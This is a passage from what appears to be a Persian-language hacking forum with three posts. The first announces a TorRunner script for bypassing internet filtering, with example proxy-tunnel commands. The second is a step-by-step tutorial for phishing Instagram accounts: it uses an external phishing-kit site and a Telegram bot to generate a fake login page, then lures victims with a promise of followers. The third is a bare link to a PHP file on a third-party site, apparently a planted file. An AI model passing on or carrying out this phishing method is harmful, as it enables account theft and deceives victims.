    ورژن جدید اسکریپت TorRunner v1.0.1 | بدون فیلتر شکن از اینترنت استفاده کنید ! فوروارد ساکس ورژن 5 Socks به یک آدرس پروکسی با ساپورت HTTP با استفاده از دستور زیر : TorRunner -pt 127.0.0.2:4545 یا TorRunner --proxy-tunnel 127.0.0.2:4545 یا TorRunner -pt 4545 با اضافه شدن این آپشن به راحتی میتونید تو تنظیمات پروکسی سیستم یا تنظیمات پروکسی مرورگر دلخواهتون آدرس پروکسی رو وارد کرده و بدون فیلتر شکن از اینترنت استفاده کنید.
  49. 7 امتیاز
    با سلام امروز میخوام یک اموزش دیگر مربوط به نفوذ به اینستاگرام رو بهتون یاد بدم. ابتدا سایت زیر رو در مرورگر خود باز کنید. https://ploits.com/signup/ 🙌داخلش ثبت نام کنید🙌 چیزی که مهمه تو ذهنتون بسپارید [یوزر ] [پسورد] که توی سایت وارد کردین هنگام ثبت باید یادتون باشه⚠️ الان باید برید ربات زیر👇 @xploitxbot دکمه Start/ رو بزنید. سپس login/ ارسال کنید. بعد از ارسال این کلید username که توی سایت ثبت نام کردید رو ارسال کنید. سپس از شما رمز اکانتی که ساختید رو میخواد. بعد اگه با موفقیت اطلاعات ثبت بشه باید گزینه اول یعنی generator/ رو ارسال کنید. گزینه instagram/ رو ارسال کنید. چون.میخوایم فیک پیج اینستا بسازیم. بعد از آن از شما یک لینک میخواد که با http شروع بشه. برای مثال میتونید ادرس ایدی اکانت خودتون یا کانال رو وارد کنید. http://t.me/*** بجای علامت *** نام کاربری خودتون رو بدون @ بزارید. مثلا اگه من بخوام ایدی خودم رو به اون صورت بزارم به این شکل میشه👇 http://t.me/ctrl123 خب پس از اون یک لینکی بهتون میده که باید بدید به قربانی و بهش بگید که سایت دریافت افزایش فالور هست یا بهش بگید پنل فالور هست و اگه قربانی اطلاعات اکانتشو وارد کنه میتونید نفوذ کنید به اکانتش.
  50. 7 امتیاز
    http://www.koppensteiner.co.at/images/news/bb.php ارسالی Mr. Moein
×
×
  • جدید...